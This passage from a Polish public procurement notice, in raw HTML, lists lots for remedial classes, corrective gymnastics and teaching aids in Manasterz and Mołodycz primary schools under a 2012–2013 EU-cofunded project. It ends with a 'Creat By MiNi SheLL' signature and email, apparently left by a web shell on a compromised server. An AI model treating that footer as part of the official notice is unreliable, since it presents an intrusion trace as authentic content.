Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Manasterzu
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 32 godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 6 uczniów.
2. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 32 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 6 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 200 godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 14 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym  
    wymiarze  w ilości 120 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Doposażenie sal dydaktycznych w pomoce dydaktyczne na doposażenie sal dydaktycznych szkół  niezbędnych do prawidłowego prowadzenia zajęć przewidzianych  w ramach projektu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
Doposażenie sal dydaktycznych w poszczególnych placówkach (szkołach podstawowych) w pomoce dydaktyczne na doposażenie sal dydaktycznych szkół  niezbędnych do prawidłowego prowadzenia zajęć przewidzianych  w ramach projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com